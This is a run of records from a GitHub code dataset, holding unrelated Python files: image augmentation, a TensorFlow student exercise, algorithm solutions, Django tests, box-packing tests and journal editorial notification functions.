range(self.num_steps + 1)]\n\n if self.normalized:\n return self._normalize(h, w, stepsx, stepsy)\n\n return {\"stepsx\": stepsx, \"stepsy\": stepsy}\n\n def get_transform_init_args_names(self):\n return \"num_steps\", \"distort_limit\", \"interpolation\", \"border_mode\", \"value\", \"mask_value\", \"normalized\"\n","repo_name":"albumentations-team/albumentations","sub_path":"albumentations/augmentations/geometric/transforms.py","file_name":"transforms.py","file_ext":"py","file_size_in_byte":62848,"program_lang":"python","lang":"en","doc_type":"code","stars":12818,"dataset":"github-code","pt":"16"} +{"seq_id":"9970624977","text":"import tensorflow as tf\r\nimport keras.layers\r\n\r\nn_neurons_h = 178\r\nn_neurons_out = 3\r\nn_epochs = 4500\r\nlearning_rate = 0.7\r\n\r\nmodel = tf.keras.Sequential()\r\nmodel.add(layers.Dense(n_neurons_h, activation=\"tanh\"))\r\nmodel.add(layers.Dense(n_neurons_h, activation=\"tanh\"))\r\nmodel.add(layers.Dense(n_neurons_out, activation=\"softmax\"))\r\n\r\nmodel.fit(training_data, training_labels, epochs=n_epochs, batch_size=32)\r\n\r\nmodel.compile(optimizer=tf.train.GradientDescentOptimizer(learning_rate=learning_rate), loss=\"binary_crossentropy\",\r\n metrics=[\"accuracy\"])\r\nmodel.fit(training_X, training_y, epochs=n_epochs)\r\n","repo_name":"Yasaman1997/Principles_Of_Datamining","sub_path":"HW3/Part2/Drinks/drinks/tensorflow.py","file_name":"tensorflow.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"10709110775","text":"# squareroot.py\n# This program takes a postiive floating point number as input\n# and outputs an approximation of its square root\n# author: Rachel King\n\ndef sqrt(n) :\n # Assuming the sqrt of n as n only\n x = n\n # To count the number of iterations\n count = 0\n while (1) :\n count += 1\n # Calculate estimate\n root = 0.5 * (x + (n / x))\n # Check for closeness # this is to set how accurate we want the result to be\n if (abs(root - x) < 0.0001) : # it's set to be accurate within 0.0001 \n break\n # Update root\n x = root\n return root\ndef amount(message = \"Please enter a postive number: \"):\n num = False\n while (not num):\n try:\n num = float(input(message))\n except ValueError:\n print(\"That was not a number: \",end=\"\")\n return num\nn = amount()\nanswer = float(sqrt(n))\nanswer_rounded = \"{:.1f}\".format(answer)\nprint(f\"The square root of {n} is approx. 
{answer_rounded}\")","repo_name":"rachel-king4/pands-problem-sheet","sub_path":"squareroot.py","file_name":"squareroot.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70916798090","text":"import jax\nimport jax.numpy as jnp\nimport dm_env\nimport numpy as np\n\n\nclass FixedReplayBuffer:\n \"\"\"Fixed-size buffer to store transition tuples.\"\"\"\n\n def __init__(self, key_replay_buffer) -> None:\n self.timestep = None\n self.last_value = None\n self._key_replay_buffer = key_replay_buffer\n\n # values_t stores one more step (it also stores last value)\n self.values_t = []\n self.obs_t = []\n self.actions_t = []\n self.rewards_tp1 = []\n self.advantages_t = []\n self.dones_tp1 = []\n self.logprobs_t = []\n\n def __len__(self):\n return len(self.dones_tp1)\n\n def add_first(self, timestep: dm_env.TimeStep) -> None:\n self.timestep = timestep\n\n def add(self, value: float, log_probability: float, action: np.ndarray, next_timestep: dm_env.TimeStep) -> None:\n \"\"\"Add a new transition to memory.\"\"\"\n assert self.timestep is not None, \"Please let the agent observe a first timestep.\"\n\n self.values_t.append(value)\n self.obs_t.append(self.timestep.observation)\n self.actions_t.append(action)\n self.rewards_tp1.append(next_timestep.reward)\n self.dones_tp1.append(next_timestep.last())\n self.logprobs_t.append(log_probability)\n self.timestep = next_timestep\n\n def add_last_value(self, value: float) -> None:\n self.values_t.append(value)\n\n def clear_memory(self):\n self.values_t = []\n self.obs_t = []\n self.actions_t = []\n self.rewards_tp1 = []\n self.advantages_t = []\n self.dones_tp1 = []\n self.logprobs_t = []\n\n def add_advantages(self, advantages):\n self.advantages_t = advantages\n\n def cast_to_numpy(self):\n self.values_t = np.array(self.values_t)\n self.obs_t = np.array(self.obs_t)\n self.actions_t = np.array(self.actions_t)\n self.rewards_tp1 = np.array(self.rewards_tp1)\n self.dones_tp1 = np.array(self.dones_tp1)\n self.logprobs_t = np.array(self.logprobs_t)\n","repo_name":"emasquil/ppo","sub_path":"ppo/replay_buffers/fixed_replay_buffer.py","file_name":"fixed_replay_buffer.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"28964575004","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Setting',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('class_name', models.CharField(max_length=100, editable=False)),\n ('name', models.CharField(max_length=100, editable=False)),\n ('verbose_name', models.CharField(max_length=100)),\n ('description', models.TextField(null=True, blank=True)),\n ('value', models.TextField(null=True, blank=True)),\n ('last_modified_date', models.DateTimeField(auto_now=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n","repo_name":"McHogardty/MedBank","sub_path":"medbank/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37043148034","text":"# Abhinav Bassi\n# CS 100 2014F Section H03\n# TTTP2: Oct 22, 2014\n\n# 1\n\ndef 
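The sqrt routine in squareroot.py above is the Babylonian (Heron's) iteration root = 0.5 * (x + n / x). A small trace generator, assuming the same starting guess x = n and the same 1e-4 stopping tolerance, just to show how few steps it needs; heron_trace is an illustrative name, not part of that script:

def heron_trace(n, tol=1e-4):
    # Same update rule as sqrt() above, but yielding every intermediate estimate.
    x = n
    while True:
        root = 0.5 * (x + n / x)
        yield root
        if abs(root - x) < tol:
            return
        x = root

# list(heron_trace(2)) -> [1.5, 1.4166..., 1.41421568..., 1.41421356...]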
tttDrawMove(t, row, col, mark, edge):\n buffer = (.2*edge)\n newEdge = edge - (2*buffer)\n t.up()\n t.width(1)\n t.goto(0,0)\n if row == 0:\n y = -((3/2)*edge)\n elif row == 1:\n y = -((1/2)*edge)\n elif row == 2:\n y = ((1/2)*edge)\n if col == 0:\n x = 0-edge\n elif col == 1:\n x = 0\n elif col == 2:\n x = 0+edge\n t.goto(x,y)\n if mark =='x' or mark == 'X':\n t.up()\n t.setheading(0)\n t.forward(newEdge/2)\n t.left(90)\n t.forward(buffer)\n t.setheading(0)\n t.left(135)\n t.down()\n t.forward(math.sqrt((newEdge**2)+(newEdge**2)))\n t.up()\n t.setheading(0)\n t.forward(newEdge)\n t.right(135)\n t.down()\n t.forward(math.sqrt((newEdge**2)+(newEdge**2)))\n t.up()\n t.setheading(0)\n t.goto(0,0)\n if mark =='o' or mark == 'O':\n t.up()\n t.setheading(0)\n t.left(90)\n t.forward(buffer)\n t.setheading(0)\n t.down()\n t.circle(newEdge/2)\n t.up()\n t.setheading(0)\n t.goto(0,0)\n\n# 2\n\ndef drawGrid(t, length, x, y):\n t.width(2)\n beginX = [x, x, x+length, x+(2*length)]\n endX = [x+(3*length), x+(3*length), x+(length), x+(2*length)]\n beginY = [y+(2*length), y+length, y, y]\n endY = [y+(2*length), y+length, y+(3*length), y+(3*length)]\n for i in range(4):\n t.up()\n t.goto(beginX[i],beginY[i])\n t.down()\n t.goto(endX[i],endY[i])\n\nimport turtle\ns = turtle.Screen()\npen = turtle.Turtle()\ndrawGrid(pen,100,-150,-150)\n\nimport math\ntttDrawMove(pen, 0, 0, 'X', 100)\ntttDrawMove(pen, 0, 1, 'X', 100)\ntttDrawMove(pen, 0, 2, 'X', 100)\ntttDrawMove(pen, 1, 0, 'O', 100)\ntttDrawMove(pen, 1, 1, 'O', 100)\ntttDrawMove(pen, 1, 2, 'O', 100)\n","repo_name":"abhibassi/cs100","sub_path":"TTTP2_AbhinavBassi.py","file_name":"TTTP2_AbhinavBassi.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10884447474","text":"#!/usr/local/bin/python3\n# -*- coding: utf-8 -*-\n\n__author__ = 'Jae'\n\nfrom typing import List\n\nfrom hot100.ListNode import ListNode\n\n\n# https://leetcode.com/problems/merge-k-sorted-lists/\nclass MergeKSortedLists:\n\n # 1.优先队列\n # 依次加入优先级队列,每次都取出最小的\n # heapq\n # Runtime: 108 ms, faster than 70.85% of Python3 online submissions for Merge k Sorted Lists.\n # Memory Usage: 17.6 MB, less than 12.12% of Python3 online submissions for Merge k Sorted Lists.\n def mergeKLists(self, lists: List[ListNode]) -> ListNode:\n if lists is None: return None\n import heapq\n head = []\n headNode = ListNode()\n tempNode = ListNode()\n headNode.next = tempNode\n for i in range(len(lists)):\n if lists[i] is None: continue\n heapq.heappush(head, (lists[i].val, i))\n if head is None: return None\n while head:\n val, index = heapq.heappop(head)\n tempNode.next = ListNode(val)\n tempNode = tempNode.next\n if lists[index]:\n lists[index] = lists[index].next\n if lists[index] is not None:\n heapq.heappush(head, (lists[index].val, index))\n return headNode.next.next\n\n # 2.分治,两个两个处理\n def mergeKLists2(self, lists: List[ListNode]) -> ListNode:\n if not lists: return None\n length = len(lists)\n return self.merge(lists, 0, length - 1)\n\n def merge(self, lists, left, right):\n if right == left:\n return lists[left]\n mid = left + (right - left) // 2\n l1 = self.merge(lists, left, mid)\n l2 = self.merge(lists, mid + 1, right)\n return self.mergeTwoLists(l1, l2)\n\n def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode:\n if l1 is None:\n return l2\n if l2 is None:\n return l1\n if l1.val <= l2.val:\n l1.next = self.mergeTwoLists(l1.next, l2)\n return l1\n else:\n l2.next = self.mergeTwoLists(l1, 
l2.next)\n return l2\n\n # 3.对值平铺,排序\n def mergeKLists3(self, lists: List[ListNode]) -> ListNode:\n list1 = []\n for i in lists:\n while i:\n list1.append(i.val)\n i = i.next\n list1.sort()\n prev = ListNode()\n res = prev\n for i in list1:\n node = ListNode(i)\n prev.next = node\n prev = node\n return res.next\n\n\nif __name__ == \"__main__\":\n listNode1 = ListNode(1)\n listNode4 = ListNode(4)\n listNode5 = ListNode(5)\n listNode1.next = listNode4\n listNode4.next = listNode5\n\n listNode12 = ListNode(1)\n listNode3 = ListNode(3)\n listNode42 = ListNode(4)\n listNode12.next = listNode3\n listNode3.next = listNode42\n\n listNode2 = ListNode(2)\n listNode6 = ListNode(6)\n listNode2.next = listNode6\n\n check = MergeKSortedLists()\n check.mergeKLists2([listNode1, listNode12, listNode2]).log()\n","repo_name":"dyjae/LeetCodeLearn","sub_path":"python/hot100/23.MergeKSortedLists.py","file_name":"23.MergeKSortedLists.py","file_ext":"py","file_size_in_byte":3043,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"11572008969","text":"from http import HTTPStatus\n\nfrom django.contrib.auth import get_user_model\nfrom django.test import TestCase, Client\nfrom django.core.cache import cache\n\nfrom ..models import Group, Post\n\n\nUser = get_user_model()\n\n\nclass PostModelTest(TestCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.user = User.objects.create_user(username='auth')\n cls.group = Group.objects.create(\n title='Тестовая группа',\n slug='test-slug',\n description='Тестовое описание',\n )\n cls.post = Post.objects.create(\n author=cls.user,\n text='Тестовый пост',\n group=cls.group\n )\n\n def setUp(self):\n cache.clear()\n self.guest_client = Client()\n self.user = User.objects.create_user(username='guest')\n self.authorized_client = Client()\n self.authorized_client.force_login(self.user)\n self.author_post = Client()\n self.author_post.force_login(self.post.author)\n\n def test_pages_all(self):\n post_id = f'/posts/{self.post.id}/'\n url_status = {\n '/': HTTPStatus.OK,\n f'/group/{self.group.slug}/': HTTPStatus.OK,\n f'/profile/{self.post.author}/': HTTPStatus.OK,\n post_id: HTTPStatus.OK,\n 'unexisting_page/': HTTPStatus.NOT_FOUND,\n }\n for address, status in url_status.items():\n with self.subTest(address=address):\n response = self.guest_client.get(address)\n self.assertEqual(response.status_code, status)\n\n def test_pages_registred(self):\n post_id = f'/posts/{self.post.id}/'\n url_status = {\n '/': HTTPStatus.OK,\n f'/group/{self.group.slug}/': HTTPStatus.OK,\n f'/profile/{self.user}/': HTTPStatus.OK,\n post_id: HTTPStatus.OK,\n '/unexisting_page/': HTTPStatus.NOT_FOUND,\n '/create/': HTTPStatus.OK,\n }\n for address, status in url_status.items():\n with self.subTest(address=address):\n response = self.authorized_client.get(address)\n self.assertEqual(response.status_code, status)\n\n def test_edit_page_for_author(self):\n edit_post = f'/posts/{self.post.id}/edit/'\n with self.subTest(address=edit_post):\n response = self.author_post.get(edit_post)\n self.assertEqual(response.status_code, HTTPStatus.OK)\n\n def test_edit_page_for_authorized_non_author(self):\n edit_post = f'/posts/{self.post.id}/edit/'\n response = self.authorized_client.get(edit_post)\n self.assertRedirects(response, f'/posts/{self.post.id}/')\n\n def test_edit_and_create_page_for_guest(self):\n edit_redir = f'/auth/login/?next=/posts/{self.post.id}/edit/'\n url_redir = {\n f'/posts/{self.post.id}/edit/': edit_redir,\n 
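The first variant in MergeKSortedLists keeps at most one node per input list in a heap keyed by (value, list index), which is the standard O(N log k) k-way merge. The same strategy on plain Python lists can be written with heapq.merge; this is only an illustration of the idea, not a replacement for the ListNode-based code above:

import heapq

lists = [[1, 4, 5], [1, 3, 4], [2, 6]]
# heapq.merge lazily pops the smallest current head among the k sorted inputs.
print(list(heapq.merge(*lists)))  # [1, 1, 2, 3, 4, 4, 5, 6]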
'/create/': '/auth/login/?next=/create/',\n }\n for address, redir in url_redir.items():\n with self.subTest(address=address):\n response = self.guest_client.get(address, follow=True)\n self.assertRedirects(response, redir)\n","repo_name":"vmikail/hw05_final","sub_path":"yatube/posts/tests/test_urls.py","file_name":"test_urls.py","file_ext":"py","file_size_in_byte":3211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42669944870","text":"from fulfillment_api.box_packing.helper import (space_after_packing,\n how_many_items_fit, pre_pack_boxes,\n api_packing_algorithm)\nfrom fulfillment_api.errors import BoxError\n\nfrom collections import Counter\nfrom testing.shotput_tests import BaseShotputTestCase\n\n\nclass HowManyItemsFitTest(BaseShotputTestCase):\n def test_exact_fit(self):\n box_info = {\n 'height': 4,\n 'width': 4,\n 'length': 4\n }\n item_info = {\n 'height': 4,\n 'width': 4,\n 'length': 4\n }\n response = how_many_items_fit(item_info, box_info)\n self.assertEqual({\n 'total_packed': 1,\n 'remaining_volume': 0\n }, response)\n\n def test_five_fit_extra_space(self):\n box_info = {\n 'height': 4,\n 'width': 4,\n 'length': 4\n }\n item_info = {\n 'height': 4,\n 'width': 3,\n 'length': 1\n }\n response = how_many_items_fit(item_info, box_info)\n self.assertEqual({\n 'total_packed': 5,\n 'remaining_volume': 4\n }, response)\n\n def test_lots_and_lots(self):\n box_info = {\n 'height': 4,\n 'width': 4,\n 'length': 4\n }\n item_info = {\n 'height': 1,\n 'width': 1,\n 'length': 1\n }\n response = how_many_items_fit(item_info, box_info)\n self.assertEqual({\n 'total_packed': 64,\n 'remaining_volume': 0\n }, response)\n\n def test_max_packed(self):\n box_info = {\n 'height': 4,\n 'width': 4,\n 'length': 4\n }\n item_info = {\n 'height': 1,\n 'width': 1,\n 'length': 1\n }\n response = how_many_items_fit(item_info, box_info, 8)\n self.assertEqual({\n 'total_packed': 8,\n 'remaining_volume': 56\n }, response)\n\n\nclass SpaceAfterPackingTest(BaseShotputTestCase):\n def test_exact_fit(self):\n box_info = {\n 'height': 4,\n 'width': 4,\n 'length': 4\n }\n item_info = {\n 'height': 4,\n 'width': 4,\n 'length': 4\n }\n response = space_after_packing(item_info, box_info)\n self.assertEqual({\n 'remaining_volume': 0,\n 'remaining_dimensional_blocks': []\n }, response)\n\n def test_additional_space(self):\n box_info = {\n 'height': 4,\n 'width': 4,\n 'length': 4\n }\n item_info = {\n 'height': 2,\n 'width': 2,\n 'length': 2\n }\n response = space_after_packing(item_info, box_info)\n self.assertEqual({\n 'remaining_volume': 56,\n 'remaining_dimensional_blocks': [\n {'width': 2, 'height': 2, 'length': 2},\n {'width': 2, 'height': 2, 'length': 4},\n {'width': 2, 'height': 4, 'length': 4}]\n }, response)\n\n\nclass PrePackBoxesTest(BaseShotputTestCase):\n\n def test_pre_pack_boxes_simple(self):\n '''\n tests to make sure we can get a pre-pack of boxes with basic non-db info\n '''\n items_info = [{\n 'width': 1,\n 'height': 1,\n 'length': 1,\n 'weight': 1,\n 'quantity': 1,\n 'dimension_units': 'inches',\n 'weight_units': 'grams',\n 'product_name': 'TEST_SKU'\n }]\n box_info = {\n 'width': 1,\n 'height': 1,\n 'length': 1,\n 'weight': 1,\n 'dimension_units': 'inches',\n 'weight_units': 'grams'\n }\n options = {}\n self.assertEqual([{\n 'packed_products': {'TEST_SKU': 1},\n 'total_weight': 2\n }], pre_pack_boxes(box_info, items_info, options))\n\n def test_pre_pack_boxes_too_heavy(self):\n '''\n tests to make sure that when a predefined max weight 
is provided it\n doesn't over load the boxes\n '''\n items_info = [{\n 'product_name': 'TEST_SKU',\n 'width': 1,\n 'height': 1,\n 'length': 1,\n 'weight': 3000,\n 'quantity': 4,\n 'dimension_units': 'inches',\n 'weight_units': 'grams'\n }]\n box_info = {\n 'width': 1,\n 'height': 2,\n 'length': 2,\n 'weight': 0,\n 'dimension_units': 'inches',\n 'weight_units': 'grams'\n }\n options = {\n 'max_weight': 8999\n }\n response = pre_pack_boxes(box_info, items_info, options)\n self.assertEqual([\n {\n 'packed_products': {'TEST_SKU': 2},\n 'total_weight': 6000\n },\n {\n 'packed_products': {'TEST_SKU': 2},\n 'total_weight': 6000\n }\n ], response)\n\n\nLONG_BOX = {\n 'width': 4,\n 'height': 4,\n 'length': 8,\n 'weight_units': 'grams',\n 'dimensional_units': 'inches',\n 'name': '4x4x8',\n 'weight': 4\n}\n\nCUBE_BOX = {\n 'width': 4,\n 'height': 4,\n 'length': 4,\n 'weight_units': 'grams',\n 'dimensional_units': 'inches',\n 'name': '4x4x4',\n 'weight': 4\n}\n\nTOO_SMALL_BOX = {\n 'width': 2,\n 'height': 2,\n 'length': 2,\n 'weight_units': 'grams',\n 'dimensional_units': 'inches',\n 'name': '2x2x2',\n 'weight': 4\n}\n\nCUBE_SKU = {\n 'width': 4,\n 'height': 4,\n 'length': 4,\n 'product_name': 'TEST',\n 'weight_units': 'grams',\n 'dimensional_units': 'inches',\n 'weight': 100\n}\n\n\nclass ApiPackingAlgorithmTest(BaseShotputTestCase):\n\n def setUp(self):\n super(ApiPackingAlgorithmTest, self).setUp()\n self.boxes = {\n '4x4x4': CUBE_BOX,\n '4x4x8': LONG_BOX,\n '2x2x2': TOO_SMALL_BOX\n }\n self.items = {\n '4x4x4': CUBE_SKU\n }\n\n def test_api_packing_algorithm_max_weight(self):\n products = [{\n 'width': 10,\n 'height': 10,\n 'length': 5,\n 'weight': 100,\n 'quantity': 1,\n 'dimension_units': 'centimeters',\n 'weight_units': 'grams',\n 'product_name': 'AG-123'\n }, {\n 'width': 10,\n 'height': 5,\n 'length': 5,\n 'weight': 100,\n 'quantity': 4,\n 'dimension_units': 'centimeters',\n 'weight_units': 'grams',\n 'product_name': 'AG-456'\n }]\n\n result = api_packing_algorithm([{\n 'width': 10,\n 'height': 10,\n 'length': 20,\n 'weight': 50,\n 'dimension_units': 'centimeters',\n 'weight_units': 'grams',\n 'name': 'Box-1'\n }, {\n 'width': 5,\n 'height': 10,\n 'length': 20,\n 'weight': 50,\n 'dimension_units': 'centimeters',\n 'weight_units': 'grams',\n 'name': 'Box-2'\n }], products, {\n 'max_weight': 300\n })\n\n expected_counts = Counter()\n for product in products:\n expected_counts[product['product_name']] += product['quantity']\n\n packed_counts = Counter()\n for package in result['packages']:\n self.assertLessEqual(package['total_weight'], 300)\n\n for item_number, quantity in package['packed_products'].iteritems():\n packed_counts[item_number] += quantity\n\n self.assertEqual(expected_counts, packed_counts)\n\n def test_api_packing_algorithm_simple(self):\n boxes_info = [self.boxes['4x4x8']]\n item = self.items['4x4x4']\n item['quantity'] = 2\n items_info = [item]\n packed_products = api_packing_algorithm(boxes_info, items_info, None)\n expected_return = {\n 'packages': [{\n 'box': self.boxes['4x4x8'],\n 'packed_products': {'TEST': 2},\n 'total_weight': 204.0\n }]\n }\n self.assertEqual(expected_return, packed_products)\n\n def test_api_packing_algorithm_two_boxes(self):\n boxes_info = [self.boxes['4x4x4'], self.boxes['4x4x8']]\n item = self.items['4x4x4']\n item['quantity'] = 2\n items_info = [item]\n packed_products = api_packing_algorithm(boxes_info, items_info, None)\n expected_return = {\n 'packages': [{\n 'box': self.boxes['4x4x8'],\n 'packed_products': {'TEST': 2},\n 'total_weight': 204.0\n 
}]\n }\n self.assertEqual(expected_return, packed_products)\n\n def test_api_packing_algorithm_last_parcel(self):\n boxes_info = [self.boxes['4x4x4'], self.boxes['4x4x8']]\n item = self.items['4x4x4']\n item['quantity'] = 3\n items_info = [item]\n\n packed_products = api_packing_algorithm(boxes_info, items_info, None)\n expected_return = {\n 'packages': [\n {\n 'packed_products': {'TEST': 2},\n 'total_weight': 204,\n 'box': self.boxes['4x4x8']\n },\n {\n 'box': self.boxes['4x4x4'],\n 'packed_products': {'TEST': 1},\n 'total_weight': 104.0\n }\n ]\n }\n self.assertEqual(expected_return, packed_products)\n\n def test_api_packing_too_small(self):\n boxes_info = [self.boxes['2x2x2']]\n item = self.items['4x4x4']\n item['quantity'] = 3\n items_info = [item]\n\n with self.assertRaises(BoxError) as context:\n api_packing_algorithm(boxes_info, items_info, None)\n self.assertEqual('Some of your products are too big for your boxes. '\n 'Please provide larger boxes.',\n context.exception.message)\n\n def test_api_packing_max_weight(self):\n boxes_info = [self.boxes['4x4x8'], self.boxes['4x4x4']]\n item = self.items['4x4x4']\n item['quantity'] = 2\n items_info = [item]\n options = {'max_weight': 200}\n\n expected_return = {\n 'packages': [\n {\n 'box': self.boxes['4x4x4'],\n 'packed_products': {'TEST': 1},\n 'total_weight': 104.0\n },\n {\n 'box': self.boxes['4x4x4'],\n 'packed_products': {'TEST': 1},\n 'total_weight': 104.0\n }\n ]\n }\n packed_products = api_packing_algorithm(boxes_info, items_info, options)\n self.assertEqual(expected_return, packed_products)\n\n def test_api_packing_non_unique(self):\n boxes_info = [self.boxes['4x4x4'], self.boxes['4x4x4']]\n item = self.items['4x4x4']\n item['quantity'] = 2\n items_info = [item]\n\n with self.assertRaises(BoxError) as context:\n api_packing_algorithm(boxes_info, items_info, None)\n self.assertEqual('Please use unique boxes with unique names',\n context.exception.message)\n","repo_name":"shotput/BoxPackingAPI","sub_path":"test_helper.py","file_name":"test_helper.py","file_ext":"py","file_size_in_byte":11257,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"16"} +{"seq_id":"17278865302","text":"__copyright__ = \"Copyright 2017 Birkbeck, University of London\"\n__author__ = \"Martin Paul Eve & Andy Byers\"\n__license__ = \"AGPL v3\"\n__maintainer__ = \"Birkbeck Centre for Technology and Publishing\"\n\nfrom django.conf import settings\nfrom django.urls import reverse\nfrom django.utils.translation import gettext_lazy as _\n\nfrom utils import (\n notify_helpers,\n models as util_models,\n setting_handler,\n render_template,\n)\nfrom core import models as core_models\nfrom review import logic as review_logic\nfrom review.const import EditorialDecisions as ED\n\n\ndef send_reviewer_withdrawl_notice(**kwargs):\n review_assignment = kwargs['review_assignment']\n request = kwargs['request']\n user_message_content = kwargs['user_message_content']\n\n if 'skip' not in kwargs:\n kwargs['skip'] = True\n\n skip = kwargs['skip']\n\n description = '{0}\\'s review of \"{1}\" has been withdrawn by {2}'.format(review_assignment.reviewer.full_name(),\n review_assignment.article.title,\n request.user.full_name())\n if not skip:\n log_dict = {'level': 'Info', 'action_text': description, 'types': 'Review Withdrawl',\n 'target': review_assignment.article}\n notify_helpers.send_email_with_body_from_user(\n request,\n 'subject_review_withdrawl',\n review_assignment.reviewer.email,\n user_message_content,\n log_dict=log_dict\n 
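The expectations in HowManyItemsFitTest above are consistent with a simple volume bound (for example, a 4x4x4 box holds floor(64 / 12) = 5 items of 4x3x1 with 4 units of volume left over). A quick sketch of that arithmetic, assuming the same dict shapes used by the tests; volume_fit_upper_bound is hypothetical, and the real how_many_items_fit packs geometrically, so it can only ever return this many or fewer:

def volume_fit_upper_bound(item, box, max_packed=None):
    # Volume-only upper bound on how many items could fit in the box.
    item_vol = item['width'] * item['height'] * item['length']
    box_vol = box['width'] * box['height'] * box['length']
    count = box_vol // item_vol
    if max_packed is not None:
        count = min(count, max_packed)
    return {'total_packed': count, 'remaining_volume': box_vol - count * item_vol}

# volume_fit_upper_bound({'width': 3, 'height': 4, 'length': 1},
#                        {'width': 4, 'height': 4, 'length': 4})
# -> {'total_packed': 5, 'remaining_volume': 4}, matching test_five_fit_extra_space.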
)\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_editor_unassigned_notice(request, message, assignment, skip=False):\n description = \"{a.editor} unassigned from {a.article} by {r.user}\".format(\n a=assignment,\n r=request,\n )\n\n if not skip:\n\n log_dict = {\n 'level': 'Info', 'action_text': description,\n 'types': 'Editor Unassigned',\n 'target': assignment.article\n }\n\n notify_helpers.send_email_with_body_from_user(\n request,\n 'subject_unassign_editor',\n assignment.editor.email,\n message,\n log_dict=log_dict,\n )\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_editor_assigned_acknowledgements_mandatory(**kwargs):\n \"\"\"\n This function is called via the event handling framework and it notifies that an editor has been assigned.\n It is wired up in core/urls.py. It is different to the below function in that this is called when an editor is\n assigned, whereas the below is only called when the user opts to send a message to the editor.\n :param kwargs: a list of kwargs that includes editor_assignment, user_message_content, skip (boolean) and request\n :return: None\n \"\"\"\n\n editor_assignment = kwargs['editor_assignment']\n article = editor_assignment.article\n request = kwargs['request']\n user_message_content = kwargs['user_message_content']\n\n if 'skip' not in kwargs:\n kwargs['skip'] = True\n\n skip = kwargs['skip']\n acknowledgement = kwargs['acknowledgement']\n\n description = '{0} was assigned as the editor for \"{1}\"'.format(editor_assignment.editor.full_name(),\n article.title)\n\n context = {\n 'article': article,\n 'request': request,\n 'editor_assignment': editor_assignment\n }\n\n log_dict = {'level': 'Info',\n 'action_text': description,\n 'types': 'Editor Assignment',\n 'target': article}\n\n # send to assigned editor\n if not skip:\n notify_helpers.send_email_with_body_from_user(\n request,\n 'subject_editor_assignment',\n editor_assignment.editor.email,\n user_message_content,\n log_dict=log_dict\n )\n\n # send to editor\n if not acknowledgement:\n notify_helpers.send_slack(request, description, ['slack_editors'])\n notify_helpers.send_email_with_body_from_setting_template(request, 'editor_assignment',\n 'subject_editor_assignment',\n request.user.email, context,\n log_dict=log_dict)\n\n\ndef send_editor_assigned_acknowledgements(**kwargs):\n \"\"\"\n This function is called via the event handling framework and it notifies that an editor has been assigned.\n It is wired up in core/urls.py.\n :param kwargs: a list of kwargs that includes editor_assignment, user_message_content, skip (boolean) and request\n :return: None\n \"\"\"\n kwargs['acknowledgement'] = True\n\n send_editor_assigned_acknowledgements_mandatory(**kwargs)\n\n\ndef send_reviewer_requested_acknowledgements(**kwargs):\n \"\"\"\n This function is called via the event handling framework and it notifies that a reviewer has been requested.\n It is wired up in core/urls.py.\n :param kwargs: a list of kwargs that includes review_assignment, user_message_content, skip (boolean) and request\n :return: None\n \"\"\"\n\n review_assignment = kwargs['review_assignment']\n article = review_assignment.article\n request = kwargs['request']\n user_message_content = kwargs['user_message_content']\n\n if 'skip' not in kwargs:\n kwargs['skip'] = True\n\n skip = kwargs['skip']\n\n description = 'A review request was added to \"{0}\" for user {1}'.format(\n article.title,\n review_assignment.reviewer.full_name(),\n )\n\n log_dict = {'level': 
'Info',\n 'action_text': description,\n 'types': 'Review Request',\n 'target': article}\n\n # send to requested reviewer\n if not skip:\n notify_helpers.send_email_with_body_from_user(\n request,\n 'subject_review_assignment',\n review_assignment.reviewer.email,\n user_message_content,\n log_dict=log_dict,\n )\n\n # send slack\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n\ndef send_review_complete_acknowledgements(**kwargs):\n \"\"\"\n This function is called via the event handling framework and it notifies that a reviewer has completed his or her\n review. It is wired up in core/urls.py.\n :param kwargs: a list of kwargs that includes review_assignment, and request\n :return: None\n \"\"\"\n review_assignment = kwargs['review_assignment']\n article = review_assignment.article\n request = kwargs['request']\n request.user = review_assignment.reviewer\n\n description = '{0} completed the review of \"{1}\": {2}'.format(\n review_assignment.reviewer.full_name(),\n article.title,\n review_assignment.get_decision_display(),\n )\n\n util_models.LogEntry.add_entry(\n types='Review Complete',\n description=description,\n level='Info',\n actor=request.user,\n target=article,\n request=request,\n )\n\n review_in_review_url = request.journal.site_url(\n path=reverse(\n 'review_in_review',\n kwargs={'article_id': article.pk},\n )\n )\n\n context = {\n 'article': article,\n 'request': request,\n 'review_assignment': review_assignment,\n }\n\n # send slack\n notify_helpers.send_slack(request, description, ['slack_editors'])\n\n # send to reviewer\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'review_complete_reviewer_acknowledgement',\n 'subject_review_complete_reviewer_acknowledgement',\n review_assignment.reviewer.email,\n context,\n )\n\n # send to editor\n context['review_in_review_url'] = review_in_review_url\n editors = get_assignment_editors(review_assignment)\n for editor in editors:\n notify_helpers.send_email_with_body_from_setting_template(\n request,\n 'review_complete_acknowledgement',\n 'subject_review_complete_acknowledgement',\n editor.email,\n context,\n )\n\n\ndef 